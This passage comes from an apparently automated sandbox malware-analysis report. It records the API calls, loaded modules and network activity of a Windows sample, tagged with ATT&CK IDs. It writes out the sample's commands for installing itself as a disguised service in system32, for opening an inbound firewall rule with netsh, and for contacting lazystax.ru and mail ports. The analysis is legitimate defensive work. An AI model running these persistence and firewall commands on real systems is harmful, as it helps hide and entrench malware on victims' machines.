\"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00002772)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00003048)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003048)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00005992)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ea36a@ADVAPI32.dll\"\n \"0e000f00703fa36a@ADVAPI32.dll\"\n \"0e000f00cc3fa36a@ADVAPI32.dll\"\n \"11001200b447a36a@ADVAPI32.dll\"\n \"110012004848a36a@ADVAPI32.dll\"\n \"120013008c48a36a@ADVAPI32.dll\"\n \"12001300e448a36a@ADVAPI32.dll\"\n \"14001500dc6fa36a@ADVAPI32.dll\"\n \"14001500f46fa36a@ADVAPI32.dll\"\n \"140015000c70a36a@ADVAPI32.dll\"\n \"170018002470a36a@ADVAPI32.dll\"\n \"0d000e003c70a36a@ADVAPI32.dll\"\n \"110012004c70a36a@ADVAPI32.dll\"\n \"110012006070a36a@ADVAPI32.dll\"\n \"0d000e003449a36a@SHELL32.dll\"\n \"0d000e00b049a36a@SHELL32.dll\"\n \"0f001000a071a36a@ADVAPI32.dll\"\n \"14001500e071a36a@ADVAPI32.dll\"\n \"14001500f871a36a@ADVAPI32.dll\"\n \"0c000d004072a36a@ADVAPI32.dll\"\n \"0c000d005072a36a@ADVAPI32.dll\"\n \"0e000f006072a36a@ADVAPI32.dll\"\n \"0e000f007072a36a@ADVAPI32.dll\"\n \"0b000c008072a36a@ADVAPI32.dll\"\n \"18001900b874a36a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\mojpivf.exe\" %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\mojpivf.exe /d\\\"C:\\8a0cabf213753b71e35186ff3f3\" - (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description tpxhoiko \"wifi internet conection\"\" - (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start tpxhoiko\" - (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005796)\n \"mojpivf.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002772)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mojpivf.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005856)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has an executable section named \".text\"\n \"mojpivf.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE4FF1.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has an writable section named \".data\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has an writable section named \".text\"\n \"mojpivf.exe\" has an writable section named \".data\"\n \"mojpivf.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE4FF1.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xa95000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xc3d000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"mojpivf.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE4FF1.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"KERNEL32.DLL\" at base 77820000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"WS2_32.DLL\" at base 75cc0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"DBGHELP.DLL\" at base 6ecf0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"USER32.DLL\" at base 77750000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"ADVAPI32.DLL\" at base 76150000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"SHELL32.DLL\" at base 768f0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"OLEAUT32.DLL\" at base 779b0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"MSVCR100.DLL\" at base 6a8f0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"OLE32.DLL\" at base 775f0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74760000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"PROPSYS.DLL\" at base 74410000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"COMCTL32.DLL\" at base 74820000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"APPHELP.DLL\" at base 75800000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"CLBCATQ.DLL\" at base 76620000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ad90000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77820000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"RPCRT4.DLL\" at base 77540000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74410000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"NTMARTA.DLL\" at base 74dc0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77bd0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"PROFAPI.DLL\" at base 75970000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75b00000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 764d0000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"SECUR32.DLL\" at base 75680000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75c80000\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77820000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 75dd0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76130000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77820000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"mojpivf.exe\" loaded module \"GDI32.DLL\" at base 75dd0000\n \"mojpivf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76130000\n \"mojpivf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"mojpivf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"mojpivf.exe\" loaded module \"KERNEL32\" at base 77820000\n \"mojpivf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"mojpivf.exe\" loaded module \"KERNEL32.DLL\" at base 77820000\n \"mojpivf.exe\" loaded module \"WS2_32.DLL\" at base 75cc0000\n \"mojpivf.exe\" loaded module \"DBGHELP.DLL\" at base 6ecf0000\n \"mojpivf.exe\" loaded module \"USER32.DLL\" at base 77750000\n \"mojpivf.exe\" loaded module \"ADVAPI32.DLL\" at base 76150000\n \"mojpivf.exe\" loaded module \"SHELL32.DLL\" at base 768f0000\n \"mojpivf.exe\" loaded module \"OLEAUT32.DLL\" at base 779b0000\n \"mojpivf.exe\" loaded module \"MSVCR100.DLL\" at base 6a680000\n \"mojpivf.exe\" loaded module \"SSPICLI.DLL\" at base 757e0000\n \"mojpivf.exe\" loaded module \"RPCRT4.DLL\" at base 77540000\n \"mojpivf.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77bd0000\n \"mojpivf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 737e0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6d290000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77820000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c340000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6a660000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69f00000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77820000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6bb50000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69ed0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6a8f0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6a5b0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a5a0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69eb0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 68b90000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68ad0000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 77540000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 68500000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 69e80000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 68430000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 68350000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 68c70000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 6a690000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 775f0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74760000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75360000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 77750000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76620000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c770000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76150000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77bd0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77bd0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77bd0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77bd0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750f0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 758f0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6ec40000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75c50000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74f30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75030000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 779b0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73cb0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 710d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77820000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6aa50000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73bc0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73fe0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73bb0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77bd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73940000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75320000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 751e0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 739c0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75cc0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 77540000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73b60000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 720a0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 757e0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77bd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e80000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005796)\n 